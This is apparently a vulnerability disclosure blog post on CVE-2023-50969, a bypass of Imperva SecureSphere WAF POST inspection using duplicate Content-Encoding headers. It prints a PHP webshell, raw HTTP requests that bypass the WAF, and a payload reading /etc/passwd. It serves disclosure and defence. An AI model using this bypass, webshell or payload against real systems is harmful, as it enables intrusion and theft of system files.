Wednesday, March 27, 2024

Bypassing Imperva SecureSphere WAF (CVE-2023-50969)

Background 

Imperva SecureSphere Web Application Firewall (WAF) is an on-premise security solution to inspect, monitor and block traffic to web applications.  Some versions of SecureSphere WAF are affected by a vulnerability that could allow an attacker to bypass WAF rules that inspect POST data and subsequently exploit flaws in protected web applications that would otherwise be blocked.


Vulnerability Summary

CVE-2023-50969 – Imperva SecureSphere WAF Bypass for POST Data Inspection Rules

Impact: An attacker is able to bypass WAF rules that inspect POST data and would be able to successfully exploit existing vulnerabilities in protected applications that would otherwise be blocked.

Severity:  Critical (CVSS 3.1 Base Score: 9.8 / Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Affected versions: Tested on Imperva SecureSphere WAF v14.7.0.40; all versions of Imperva SecureSphere without the Application Defense Center (ADC) update referenced in the "Fixed Version(s)" section are vulnerable.  Imperva Cloud WAF is not affected.

Fixed Version(s):  Per Imperva, this issue can be remediated by an ADC rule update that was released on February 26, 2024.  Imperva customers may get more information by logging into the Imperva Support Portal and reviewing the following document: https://docs.imperva.com/bundle/z-kb-articles-km/page/f81a5705.html


Technical Details

To demonstrate the vulnerability, let’s assume that a protect application includes some vulnerable code.  In our case it’s a wildly insecure PHP webshell named clam.php:


<html>
<body>
<form method="POST" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="cmd" id="cmd" >
<input type="submit" value="Execute">
</form>
<pre>
<?php
    if(isset($_POST['cmd']))
    {
        system($_POST['cmd']);
    }
?>
</pre>
</body>
</html>


By design, this page will execute any system command passed in the cmd POST parameter.

Many commands, such as trying to execute cat /etc/password , will get blocked by standard WAF rules.  (The same would apply for many other specific vulnerabilities and vulnerability classes such as Cross-Site Scripting, SQL Injection, and more.). For example: 

POST /clam.php HTTP/1.1
Host: my.target.host
User-Agent: Mozilla/5.0 
Content-Type: application/x-www-form-urlencoded
Content-Length: 19

cmd=cat+/etc/passwd


As expected, this gets blocked by a standard WAF rule:



However, we can bypass the blocking WAF rule by sending a request with two (or more) specially-crafted Content-Encoding headers.  (The Content-Encoding header is intended to list any encodings that have been applied to the HTTP message body.  Valid values are br, compress, deflate, and gzip).

If we modify our request and add a Content-Encoding: header with an arbitrary value, followed by a Content-Encoding: gzip header, we can then bypass the responsible WAF rule:


POST /clam.php HTTP/1.1
Host: my.target.host
User-Agent: Mozilla/5.0 
Content-Type: application/x-www-form-urlencoded
Content-Encoding: No Kill No Beep Beep
Content-Encoding: gzip

Content-Length: 19

cmd=cat+/etc/passwd



In addition to using a gzip Header value, we can also successfully bypass WAF rules with an extra Content-Encoding header followed by a Content-Encoding: deflate header.  However, I’ve observed that in order to bypass some rules you may need to also add a throwaway POST parameter/value pair prior to the parameter/value pairs that would otherwise trigger a WAF rule.  So to successfully exploit our example above, we’d need to send request like:


POST /clam.php HTTP/1.1
Host: my.target.host
User-Agent: Mozilla/5.0 
Content-Type: application/x-www-form-urlencoded
Content-Encoding: No Kill No Beep Beep
Content-Encoding: deflate

Content-Length: 19

qand=notu&cmd=cat+/etc/passwd


Remediation Recommendations

Per Imperva, this issue can be remediated by an ADC rule update that was released on February 26, 2024.  Imperva customers may get more information by logging into the Imperva Support Portal and reviewing the following document: https://docs.imperva.com/bundle/z-kb-articles-km/page/f81a5705.html


Acknowledgments

I’d like to thank Imperva for their prompt response to this vulnerability and Carl Livitt for his previous security research on Imperva WAFs.


Timeline

2023-11-10 - Reported the vulnerability to the Imperva.

2024-02-26 - ADC rule update to remediate the vulnerability available from Imperva.

2024-03-27 - Blog post published.


No comments:

Post a Comment